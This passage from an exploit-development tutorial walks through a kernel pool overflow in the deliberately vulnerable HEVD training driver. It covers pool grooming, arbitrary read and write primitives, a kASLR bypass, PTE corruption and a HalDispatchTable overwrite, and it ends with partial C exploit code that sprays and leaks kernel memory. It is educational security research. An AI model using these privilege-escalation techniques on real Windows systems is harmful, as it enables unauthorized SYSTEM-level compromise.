This function, which returns an integer value, performs a for loop based on MAX_OBJECT_COUNT to determine if the g_ARWHelperObjectNonPagedPoolNx array, which is an array of pointers to ARW_HELPER_OBJECT_NON_PAGED_POOL_NXs, has a value assigned for a given index, which starts at 0. For instance, the for loop first checks if the 0th element in the g_ARWHelperObjectNonPagedPoolNx array is assigned a value. If it is assigned, the index into the array is increased by one. This keeps occurring until the for loop can no longer find a value assigned to a given index. When this is the case, the current value used as the counter is assigned to the value FreeIndex. This value is then passed to the assignment operation used to assign the in-scope ARWHelperObject to the array managing all such objects. This loop occurs MAX_OBJECT_COUNT times, which is defined in ArbitraryReadWriteHelperNonPagedPoolNx.h as #define MAX_OBJECT_COUNT 65535. This is the total amount of objects that can be managed by the g_ARWHelperObjectNonPagedPoolNx array.

The tl;dr of what happens here is in the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function is:

  1. Create a PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT object called ARWHelperObject
  2. Set the Name member of ARWHelperObject to a buffer on the NonPagedPoolNx, which has a value of 0
  3. Set the Length member of ARWHelperObject to the value specified by the user-supplied input buffer via DeviceIoControl
  4. Assign this object to an array which manages all active PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT objects
  5. Return the address of the ARWHelpeObject to user mode via the output buffer of DeviceIoControl

Here is a diagram of this in action.

Let’s take a look at the next IOCTL handler after CreateArbitraryReadWriteHelperObjectNonPagedPoolNx which is SetArbitraryReadWriteHelperObjecNameNonPagedPoolNxIoctlHandler. This IOCTL handler will take the user buffer supplied by DeviceIoControl, which is expected to be of type ARW_HELPER_OBJECT_IO. This structure is then passed to the function SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx, which is prototyped as such:

NTSTATUS
SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx(
    _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
)

Let’s take a look at what this function will do with our input buffer. Recall last time we were able to specify the length that was used in the operation on the size of the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object ARWHelperObject. Additionally, we were able to return the address of this pointer to user mode.

This function starts off by defining a few variables:

  1. A pointer named Name
  2. A pointer named HelperObjectAddress
  3. An integer value named Index which is assigned to the status STATUS_INVALID_INDEX
  4. An NTSTATUS code

After these values are declared, This function first checks to make sure the input buffer from user mode, the ARW_HELPER_OBJECT_IO pointer, is in user mode. After confirming this, The Name member, which is a pointer, from this user mode buffer is stored into the pointer Name, previously declared in the listing of declared variables. The HelperObjectAddress member from the user mode buffer - which, after the call to CreateArbitraryReadWriteHelperObjectNonPagedPoolNx, contained the kernel mode address of the PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT ARWHelperObject, is extracted and stored into the declared HelperObjectAddress at the beginning of the function.

A call to GetIndexFromPointer is made, with the address of the HelperObjectAddress as the argument in this call. If the return value is STATUS_INVALID_INDEX, an NTSTATUS code of STATUS_INVALID_INDEX is returned to the caller. If the function returns anything else, the Index value is printed to the screen.

Where does this value come from? GetIndexFromPointer is defined as such.

This function will accept a value of any pointer, but realistically this is used for a pointer to a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. This function takes the supplied pointer and indexes the array of ARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointers, g_ARWHelperObjectNonPagedPoolNx. If the value hasn’t been assigned to the array (e.g. if CreateArbitraryReadWriteHelperObjectNonPagedPoolNx wasn’t called, as this will assign any created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX to the array or the object was freed), STATUS_INVALID_INDEX is returned. This function basically makes sure the in-scope ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is managed by the array. If it does exist, this function returns the index of the array the given object resides in.

Let’s take a look at the next snipped of code from the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function.

After confirming the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX exists, a check is performed to ensure the Name pointer, which was extracted from the user mode buffer of type PARW_HELPER_OBJECT_IO’s Name member, is in user mode. Note that g_ARWHelperObjectNonPagedPoolNx[Index] is being used in this situation as another way to reference the in-scope ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, since all g_ARWHelperObjectNonPagedPoolNx is at the end of the day is an array, of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX, which manages all active ARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointers.

After confirming the buffer is coming from user mode, this function finishes by copying the value of Name, which is a value supplied by us via DeviceIoControl and the ARW_HELPER_OBJECT_IO object, to the Name member of the previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX via CreateArbitraryReadWriteHelperObjectNonPagedPoolNx.

Let’s test this theory in WinDbg. What we should be looking for here is the value specified by the Name member of our user-supplied ARW_HELPER_OBJECT_IO should be written to the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object created in the previous call to CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Our updated code looks as follows.

The above code should overwrite the Name member of the previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object from the function CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Note that the IOCTL for the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function is 0x00222067.

We can then set a breakpoint in WinDbg to perform dynamic analysis.

Then we can set a breakpoint on ProbeForRead, which will take the first argument, which is our user-supplied ARW_HELPER_OBJECT_IO, and verify if it is in user mode. We can parse this memory address in WinDbg, which would be in RCX when the function call occurs due to the __fastcall calling convention, and see that this not only is a user-mode buffer, but it is also the object we intended to send from user mode for the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function.

This HelperObjectAddress value is the address of the previously created/associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. We can also verify this in WinDbg.

Recall from earlier that the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object has it’s Length member taken from the Length sent from our user-mode ARW_HELPER_OBJECT_IO structure. The Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is also initialized to zero, per the RtlFillMemory call from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx routine - which initializes the Name buffer to 0 (recall the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is actually a buffer that was allocated via ExAllocatePoolWithTag by using the specified Length of our ARW_HELPER_OBJECT_IO structure in our DeviceIoControl call).

ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name is the member that should be overwritten with the contents of the ARW_HELPER_OBJECT_IO object we sent from user mode, which currently is set to 0x4141414141414141. Knowing this, let’s set a breakpoint on the RtlCopyMemory routine, which will show up as memcpy in HEVD via WinDbg.

This fails. The error code here is actually access denied. Why is this? Recall that there is a one final call to ProbeForRead directly before the memcpy call.

ProbeForRead(
    Name,
    g_ARWHelperObjectNonPagedPoolNx[Index]->Length,
    (ULONG)__alignof(UCHAR)
);

The Name variable here is extracted from the user-mode buffer ARW_HELPER_OBJECT_IO. Since we supplied a value of 0x4141414141414141, this technically isn’t a valid address and the call to ProbeForRead will not be able to locate this address. Instead, let’s create a user-mode pointer and leverage it instead!

After executing the code again and hitting all the breakpoints, we can see that execution now reaches the memcpy routine.

After executing the memcpy routine, the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object created from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function now points to the value specified by our user-mode buffer, 0x4141414141414141.

We are starting to get closer to our goal! You can see this is pretty much an uncontrolled arbitrary write primitive in and of itself. The issue here however is that the value we can overwrite, which is ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name is a pointer which is allocated in the kernel via ExAllocatePoolWithTag. Since we cannot directly control the address stored in this member, we are limited to only overwriting what the kernel provides us. The goal for us will be to use the pool overflow vulnerability to overcome this (in the future).

Before getting to the exploitation phase, we need to investigate one more IOCTL handler, plus the IOCTL handler for deleting objects, which should not be time consuming.

The last IOCTL handler to investigate is the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNxIoctlHandler IOCTL handler.

This handler passes the user-supplied buffer, which is of type ARW_HELPER_OBJECT_IO to GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx. This function is identical to the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function, in that it will copy one Name member to another Name member, but in reverse order. As seen below, the Name member used in the destination argument for the call to RtlCopyMemory is from the user-supplied buffer this time.

This means that if we used the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function to overwrite the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function then we could use the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx to get the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object and bubble it up back to user mode. Let’s modify our code to outline this. The IOCTL code to reach the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function is 0x0022206B.

In this case we do not need WinDbg to validate anything. We can simply set the contents of our ARW_HELPER_OBJECT_IO.Name member to junk as a POC that after the IOCL call to reach GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx, this member will be overwritten by the contents of the associated/previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which will be 0x4141414141414141.

Since tempBuffer is assigned to ARW_HELPER_OBJECT_IO.Name, this is technically the value that will inherit the contents of ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name in the memcpy operation from the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function. As we can see, we can successfully retrieve the contents of the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name object. Again, however, the issue is that we are not able to choose what ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name points to, as this is determined by the driver. We will use our pool overflow vulnerability soon to overcome this limitation.

The last IOCTL handler is the delete operation, found in DeleteArbitraryReadWriteHelperObjecNonPagedPoolNxIoctlHandler.

This IOCTL handler parses the input buffer from DeviceIoControl as an ARW_HELPER_OBJECT_IO structure. This buffer is then passed to the DeleteArbitraryReadWriteHelperObjecNonPagedPoolNx function.

This function is pretty simplistic - since the HelperObjectAddress is pointing to the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, this member is used in a call to ExAllocateFreePoolWithTag to free the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. Additionally, the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name member, which also is allocated by ExAllocatePoolWithTag is freed.

Now that we know all of the ins-and-outs of the driver’s functionality, we can continue (please note that we are fortunate to have source code in this case. Leveraging a disassembler make take a bit more time to come to the same conclusions we were able to come to).

Okay, Now Let’s Get Into Exploitation (For Real This Time)

We know that our situation currently allows for an uncontrolled arbitrary read/write primitive. This is because the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name member is set currently to the address of a pool allocation via ExAllocatePoolWithTag. With our pool overflow we will try to overwrite this address to a meaningful address. This will allow for us to corrupt a controlled address - thus allowing us to obtain an arbitrary read/write primitive.

Our strategy for grooming the pool, due to all of these objects being the same size and being allocated on the same pool type (NonPagedPoolNx), will be as follows:

  1. “Fill the holes” in the current page servicing allocations of size 0x20
  2. Groom the pool to obtain the following layout: VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX
  3. Leverage the read/write primitive to write our shellcode, one QWORD at a time, to KUSER_SHARED_DATA+0x800 and flip the no-eXecute bit to bypass kernel-mode DEP

Recall earlier the sentiment about needing to preserve _POOL_HEADER structures? This is where everything goes full circle for us. Recall from Part 1 that the kLFH still uses the legacy _POOL_HEADER structures to process and store metadata for pool chunks. This means there is no encoding going on, and it is possible to hardcode the header into the exploit so that when the pool overflow occurs we can make sure when the header is overwritten it is overwritten with the same content as before.

Let’s inspect the value of a _POOL_HEADER of a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we would be overflowing into.

Since this chunk is 16 bytes and will be part of the kLFH, it is prepended with a standard _POOL_HEADER structure. Since this is the case, and there is no encoding, we can simply hardcode the value of the _POOL_HEADER (recall that the _POOL_HEADER will be 0x10 bytes before the value returned by ExAllocatePoolWithTag). This means we can hardcode the value 0x6b63614802020000 into our exploit so that at the time of the overflow into the next chunk, which should be into one of these ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects we have previously sprayed, the first 0x10 bytes that are overflown of this chunk, which will be the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX’s _POOL_HEADER, will be preserved and kept as valid, bypassing the earlier issue shown when an invalid header occurs.

Knowing this, and knowing we have a bit of work to do, let’s rearrange our current exploit to make it more logical. We will create three functions for grooming:

  1. fillHoles()
  2. groomPool()
  3. pokeHoles()

These functions can be seen below.

fillHoles()

groomPool()

pokeHoles()

Please refer to Part 1 to understand what this is doing, but essentially this technique will fill any fragments in the corresponding kLFH bucket in the NonPagedPoolNx and force the memory manager to (theoretically) give us a new page to work with. We then fill this new page with objects we control, e.g. the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects

Since we have a controlled pool-based overflow, the goal will be to overwrite any of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX structures with the “vulnerable chunk” that copies memory into the allocation, without any bounds checking. Since the vulnerable chunk and the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX chunks are of the same size, they will both wind up being adjacent to each other theoretically, since they will land in the same kLFH bucket.

The last function, called readwritePrimitive() contains most of the exploit code.

The first bit of this function creates a “main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX via an ARW_HELPER_OBJECT_IO object, and performs the filling of the pool chunks, fills the new page with objects we control, and then frees every other one of these objects.

After freeing every other object, we then replace these freed slots with our vulnerable buffers. We also create a “standalone/main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. Also note that the pool header is 16 bytes in size, meaning it is 2 QWORDS, hence “Padding”.

What we actually hope to do here, is the following.

We want to use a controlled write to only overwrite the first member of this adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, Name. This is because we have additional primitives to control and return these values of the Name member as shown in this blog post. The issue we have had so far, however, is the address of the Name member of a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is completely controlled by the driver and cannot be influenced by us, unless we leverage a vulnerability (a la pool overflow).

As shown in the readwritePrimitive() function, the goal here will be to actually corrupt the adjacent chunk(s) with the address of the “main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we will manage via ARW_HELPER_OBJECT_IO.HelperObjectAddress. We would like to corrupt the adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a precise overflow to corrupt the Name value with the address of our “main” object. Currently this value is set to 0x9090909090909090. Once we prove this is possible, we can then take this further to obtain the eventual read/write primitive.

Setting a breakpoint on the TriggerBufferOverflowNonPagedPoolNx routine in HEVD.sys, and setting an additional breakpoint on the memcpy routine, which performs the pool overflow, we can investigate the contents of the pool.

As seen in the above image, we can clearly see we have flooded the pool with controlled ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects, as well as the “current” chunk - which refers to the vulnerable chunk used in the pool overflow. All of these chunks are prefaced with the Hack tag.

Then, after stepping through execution until the mempcy routine, we can inspect the contents of the next chunk, which is 0x10 bytes after the value in RCX, which is used in the destination for the memory copy operation. Remember - our goal is to overwrite the adjacent pool chunks. Stepping through the operation to clearly see that we have corrupted the next pool chunk, which is of type ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.

We can validate that the address which was written out-of-bounds is actually the address of the “main”, standalone ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object we created.

Remember - a _POOL_HEADER structure is 0x10 bytes in length. This makes every pool chunk within this kLFH bucket 0x20 bytes in total size. Since we want to overflow adjacent chunks, we need to preserve the pool header. Since we are in the kLFH, we can just hardcode the pool header, as we have proven, to satisfy the pool and to avoid any crashes which may arise as a result of an invalid pool chunk. Additionally, we can corrupt the first 0x10 bytes of the value in RCX, which is the destination address in the memory copy operation, because there are 0x20 bytes in the “vulnerable” pool chunk (which is used in the copy operation). The first 0x10 bytes are the header and the second half we actually don’t care about, as we are worried about corrupting an adjacent chunk. Because of this, we can set the first 0x10 bytes of our copy, which writes out of bounds, to 0x10 to ensure that the bytes which are copied out of bounds are the bytes that comprise the pool header of the next chunk.

We have now successfully performed out out-of-bounds write via a pool overflow, and have corrupted an adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object’s Name member, which is dynamically allocated on the pool before had and has an address we do not control, unless we use a vulnerability such as an out-of-bounds write, with an address we do control, which is the address of the object created previously.

Arbitrary Read Primitive

Although it may not be totally apparent currently, our exploit strategy revolves around our ability to use our pool overflow to write out-of-bounds. Recall that the “Set” and “Get” capabilities in the driver allow us to read and write memory, but not at controlled locations. The location is controlled by the pool chunk allocated for the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.

Let’s take a look at the corrupted ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. The corrupted object is one of the many sprayed objects. We successfully overwrote the Name member of this object with the address of the “main”, or standalone ARE_HELPER_OBJECT_NON_PAGED_POOL_NX object.

We know that it is possible to set the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX structure via the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function through an IOCTL invocation. Since we are now able to control the value of Name in the corrupted object, let’s see if we can’t abuse this through an arbitrary read primitive.

Let’s break this down. We know that we currently have a corrupted object with a Name member that is set to the value of another object. For brevity, we can recall this from the previous image.

If we do a “Set” operation currently on the corrupted object, shown in the dt command and currently has its Name member set to 0xffffa00ca378c210, it will perform this operation on the Name member. However, we know that the Name member is actually currently set to the value of the “main” object via the out-of-bounds write! This means that performing a “Set” operation on the corrupted object will actually take the address of the main object, since it is set in the Name member, dereference it, and write the contents specified by us. This will cause our main object to then point to whatever we specify, instead of the value of ffffa00ca378c3b0 currently outlined in the memory contents shown by dq in WinDbg. How does this turn into an arbitrary read primitive? Since our “main” object will point to whatever address we specify, the “Get” operation, if performed on the “main” object, will then dereference this address specified by us and return the value!

In WinDbg, we can “mimic” the “Set” operation as shown.

Performing the “Set” operation on the corrupted object will actually set the value of our main object to whatever is specified to the user, due to us corrupting the previous random address with the pool overflow vulnerability. At this point, performing the “Get” operation on our main object, since it was set to the value specified by the user, would dereference the value and return it to us!

At this point we need to identify what out goal is. To comprehensively bypass kASLR, our goal is as follows:

  1. Use the base address of HEVD.sys from the original exploit in part one to provide the offset to the Import Address Table
  2. Supply an IAT entry that points to ntoskrnl.exe to the exploit to be arbitrarily read from (thus obtaining a pointer to ntoskrnl.exe)
  3. Calculate the distance from the pointer to the kernel to obtain the base

We can update our code to outline this. As you may recall, we have groomed the pool with 5000 ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects. However, we did not spray the pool with 5000 “vulnerable” objects. Since we have groomed the pool, we know that our vulnerable object we can arbitrarily write past will end up adjacent to one of the objects used for grooming. Since we only trigger the overflow once, and since we have already set Name values on all of the objects used for grooming, a value of 0x9090909090909090, we can simply use the “Get” operation in order to view each Name member of the objects used for grooming. If one of the objects does not contain NOPs, this is indicative that the pool overflow outlined previously to corrupt the Name value of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX has succeeded.

After this, we can then use the same primitive previously mentioned about now using the “Set” functionality in HEVD to set the Name member of the targeted corrupted object, which would actually “trick” the program to overwrite the Name member of the corrupted object, which is actually the address of the “standalone”/main ARW_HELPER_OBJECT_NON_PAGED_POOL_NX. The overwrite will dereference the standalone object, thus allowing for an arbitrary read primitive since we have the ability to then later use the “Get” functionality on the main object later.

We then can add a “press enter to continue” function to our exploit to pause execution after the main object is printed to the screen, as well as the corrupted object used for grooming that resides within the 5000 objects used for grooming.

We then can take the address 0xffff8e03c8d5c2b0, which is the corrupted object, and inspect it in WinDbg. If all goes well, this address should contain the address of the “main” object.

Comparing the Name member to the previous screenshot in which the exploit with the “press enter to continue” statement is in, we can see that the pool corruption was successful and that the Name member of one of the 5000 objects used for grooming was overwritten!

Now, if we were to use the “Set” functionality of HEVD and supply the ARW_HELPER_OBJECT_NON_PAGED_POOL object that was corrupted and also used for grooming, at address 0xffff8e03c8d5c2b0, HEVD would use the value stored in Name, dereference it, and overwrite it. This is because HEVD is expecting one of the pool allocations previously showcased for Name pointers, which we do not control. Since we have supplied another address, what HEVD will actually do is perform the overwite, but this time it will overwrite the pointer we supplied, which is another ARW_HELPER_OBJECT_NON_PAGED_POOL. Since the first member of one of these objects has a member Name, what will happen is that HEVD will actually write whatever we supply to the Name member of our main object! Let’s view this in WinDbg.

As our exploit showcased, we are using HEVD+0x2038 in this case. This value should be written to our main object.

As you can see, our main object now has its Name member pointing to HEVD+0x2038, which is a pointer to the kernel! After running the full exploit, we have now obtained the base address of HEVD from the previous exploit, and now the base of the kernel via an arbitrary read by way of pool overflow - all from low integrity!

The beauty of this technique of leveraging two objects should be clear now - we do not have to constantly perform overflows of objects in order to perform exploitation. We can now just simply use the main object to read!

Our exploitation technique will be to corrupt the page table entries of our eventual memory page our shellcode resides in. If you are not familiar with this technique, I have two blogs written on the subject, plus one about memory paging. You can find them here: one, two, and three.

For our purposes, we will need to following items arbitrarily read:

  1. nt!MiGetPteAddress+0x13 - this contains the base of the PTEs needed for calculations
  2. PTE bits that make up the shellcode page
  3. [nt!HalDispatchTable+0x8] - used to execute our shellcode. We first need to preserve this address by reading it to ensure exploit stability

Let’s add a routine to address the first issue, reading the base of the page table entries. We can calculate the offset to the function MiGetPteAddress+0x13 and then use our arbitrary read primitive.

Leveraging the exact same method as before, we can see we have defeated page table randomization and have the base of the page table entries in hand!

The next step is to obtain the PTE bits that make up the shellcode page. We will eventually write our shellcode to KUSER_SHARED_DATA+0x800 in kernel mode, which is at a static address of 0xfffff87000000800. We can instrument the routine to obtain this information in C.

After running the updated exploit, we can see that we are able to leak the PTE bits for KUSER_SHARED_DATA+0x800, where our shellcode will eventually reside.

Note that the !pte extension in WinDbg was giving myself trouble. So, from the debuggee machine, I ran WinDbg “classic” with local kernel debugging (lkd) to show the contents of !pte. Notice the actual virtual address for the PTE has changed, but the contents of the PTE bits are the same. This is due to myself rebooting the machine and kASLR kicking in. The WinDbg “classic” screenshot is meant to just outline the PTE contents.

You can view this previous blog) from myself to understand the permissions KUSER_SHARED_DATA has, which is write but no execute. The last item we need is the contents of [nt!HalDispatchTable].

After executing the updated code, we can see we have preserved the value [nt!HalDispatchTable+0x8].

The last item on the agenda is the write primitive, which is 99 percent identical to the read primitive. After writing our shellcode to kernel mode and then corrupting the PTE of the shellcode page, we will be able to successfully escalate our privileges.

Arbitrary Write Primitive

Leveraging the same concepts from the arbitrary read primitive, we can also arbitrarily overwrite 64-bit pointers! Instead of using the “Get” operation in order to fetch the dereferenced contents of the Name value specified by the “corrupted” ARW_HELPER_NON_PAGED_POOL_NX object, and then returning this value to the Name value specified by the “main” object, this time we will set the Name value of the “main” object not to a pointer that receives the contents, but to the value of what we would like to overwrite memory with. In this case, we want to set this value to the value of shellcode, and then set the Name value of the “corrupted” object to KUSER_SHARED_DATA+0x800 incrementally.

From here we can run our updated exploit. Since we have created a loop to automate the writing process, we can see we are able to arbitrarily write the contents of the 9 QWORDS which make up our shellcode to KUSER_SHARED_DATA+0x800!

Awesome! We have now successfully performed the arbitrary write primitive! The next goal is to corrupt the contents of the PTE for the KUSER_SHARED_DATA+0x800 page.

From here we can use WinDbg classic to inspect the PTE before and after the write operation.

Awesome! Our exploit now just needs three more things:

  1. Corrupt [nt!HalDispatchTable+0x8] to point to KUSER_SHARED_DATA+0x800
  2. Invoke ntdll!NtQueryIntervalPRofile, which will perform the transition to kernel mode to invoke [nt!HalDispatchTable+0x8], thus executing our shellcode
  3. Restore [nt!HalDispatchTable+0x8] with the arbitrary write primitive

Let’s update our exploit code to perform step one.

After executing the updated code, we can see that we have successfully overwritten nt!HalDispatchTable+0x8 with the address of KUSER_SHARED_DATA+0x800 - which contains our shellcode!

Next, we can add the routing to dynamically resolve ntdll!NtQueryIntervalProfile, invoke it, and then restore [nt!HalDispatchTable+0x8]

The final result is a SYSTEM shell from low integrity!

“…Unless We Conquer, As Conquer We Must, As Conquer We Shall.”

Hopefully you, as the reader, found this two-part series on pool corruption useful! As aforementioned in the beginning of this post, we must expect mitigations such as VBS and HVCI to be enabled in the future. ROP is still a viable alternative in the kernel due to the lack of kernel CET (kCET) at the moment (although I am sure this is subject to change). As such, techniques such as the one outlined in this blog post will soon be deprecated, leaving us with fewer options for exploitation than which we started. Data-only attacks are always viable, and there have been more novel techniques mentioned, such as this tweet sent to myself by Dmytro, which talks about leveraging ROP to forge kernel function calls even with VBS/HVCI enabled. As the title of this last section of the blog articulates, where there is a will there is a way - and although the bar will be raised, this is only par for the course with exploit development over the past few years. KPP + VBS + HVCI + kCFG/kXFG + SMEP + DEP + kASLR + kCET and many other mitigations will prove very useful for blocking most exploits. I hope that researchers stay hungry and continue to push the limits with this mitigations to find more novel ways to keep exploit development alive!

Peace, love, and positivity :-).

Here is the final exploit code, which is also available on my GitHub:

// HackSysExtreme Vulnerable Driver: Pool Overflow + Memory Disclosure
// Author: Connor McGarr (@33y0re)

#include <windows.h>
#include <stdio.h>

// typdef an ARW_HELPER_OBJECT_IO struct
typedef struct _ARW_HELPER_OBJECT_IO
{
    PVOID HelperObjectAddress;
    PVOID Name;
    SIZE_T Length;
} ARW_HELPER_OBJECT_IO, * PARW_HELPER_OBJECT_IO;

// Create a global array of ARW_HELPER_OBJECT_IO objects to manage the groomed pool allocations
ARW_HELPER_OBJECT_IO helperobjectArray[5000] = { 0 };

// Prepping call to nt!NtQueryIntervalProfile
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);

// Leak the base of HEVD.sys
unsigned long long memLeak(HANDLE driverHandle)
{
    // Array to manage handles opened by CreateEventA
    HANDLE eventObjects[5000];

    // Spray 5000 objects to fill the new page
    for (int i = 0; i <= 5000; i++)
    {
        // Create the objects
        HANDLE tempHandle = CreateEventA(
            NULL,
            FALSE,
            FALSE,
            NULL
        );

        // Assign the handles to the array
        eventObjects[i] = tempHandle;
    }

    // Check to see if the first handle is a valid handle
    if (eventObjects[0] == NULL)
    {
        printf("[-] Error! Unable to spray CreateEventA objects! Error: 0x%lx\n", GetLastError());

        return 0x1;
        exit(-1);
    }
    else
    {
        printf("[+] Sprayed CreateEventA objects to fill holes of size 0x80!\n");

        // Close half of the handles
        for (int i = 0; i <= 5000; i += 2)
        {
            BOOL tempHandle1 = CloseHandle(
                eventObjects[i]
            );

            eventObjects[i] = NULL;

            // Error handling
            if (!tempHandle1)
            {
                printf("[-] Error! Unable to free the CreateEventA objects! Error: 0x%lx\n", GetLastError());

                return 0x1;
                exit(-1);
            }
        }

        printf("[+] Poked holes in the new pool page!\n");

        // Allocate UaF Objects in place of the poked holes by just invoking the IOCTL, which will call ExAllocatePoolWithTag for a UAF object
        // kLFH should automatically fill the freed holes with the UAF objects
        DWORD bytesReturned;

        for (int i = 0; i < 2500; i++)
        {
            DeviceIoControl(
                driverHandle,
                0x00222053,
                NULL,
                0,
                NULL,
                0,
                &bytesReturned,
                NULL
            );
        }

        printf("[+] Allocated objects containing a pointer to HEVD in place of the freed CreateEventA objects!\n");

        // Close the rest of the event objects
        for (int i = 1; i <= 5000; i += 2)
        {
            BOOL tempHandle2 = CloseHandle(
                eventObjects[i]
            );

            eventObjects[i] = NULL;

            // Error handling
            if (!tempHandle2)
            {
                printf("[-] Error! Unable to free the rest of the CreateEventA objects! Error: 0x%lx\n", GetLastError());

                return 0x1;
                exit(-1);
            }
        }

        // Array to store the buffer (output buffer for DeviceIoControl) and the base address
        unsigned long long outputBuffer[100];
        unsigned long long hevdBase = 0;

        // Everything is now, theoretically, [FREE, UAFOBJ, FREE, UAFOBJ, FREE, UAFOBJ], barring any more randomization from the kLFH
        // Fill some of the holes, but not all, with vulnerable chunks that can read out-of-bounds (we don't want to fill up all the way to avoid reading from a page that isn't mapped)

        for (int i = 0; i <= 100; i++)
        {
            // Return buffer
            DWORD bytesReturned1;

            DeviceIoControl(
                driverHandle,
                0x0022204f,
                NULL,
                0,
                &outputBuffer,
                sizeof(outputBuffer),
                &bytesReturned1,
                NULL
            );

        }

        printf("[+] Successfully triggered the out-of-bounds read!\n");

        // Parse the output
        for (int i = 0; i <= 100; i++)
        {
            // Kernel mode address?
            if ((outputBuffer[i] & 0xfffff00000000000) == 0xfffff00000000000)
            {
                printf("[+] Address of function pointer in HEVD.sys: 0x%llx\n", outputBuffer[i]);
                printf("[+] Base address of HEVD.sys: 0x%llx\n", outputBuffer[i] - 0x880CC);

                // Store the variable for future usage
                hevdBase = outputBuffer[i] - 0x880CC;

                // Return the value of the base of HEVD
                return hevdBase;
            }
        }
    }
}

// Function used to fill the holes in pool pages
void fillHoles(HANDLE driverHandle)
{
    // Instantiate an ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO tempObject = { 0 };

    // Value to assign the Name member of each ARW_HELPER_OBJECT_IO
    unsigned long long nameValue = 0x9090909090909090;

    // Set the length to 0x8 so that the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object allocated in the pool has its Name member allocated to size 0x8, a 64-bit pointer size
    tempObject.Length = 0x8;

    // Bytes returned
    DWORD bytesreturnedFill;

    for (int i = 0; i <= 5000; i++)
    {
        // Set the Name value to 0x9090909090909090
        tempObject.Name = &nameValue;

        // Allocate a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a Name member of size 0x8 and a Name value of 0x9090909090909090
        DeviceIoControl(
            driverHandle,
            0x00222063,
            &tempObject,
            sizeof(tempObject),
            &tempObject,
            sizeof(tempObject),
            &bytesreturnedFill,
            NULL
        );

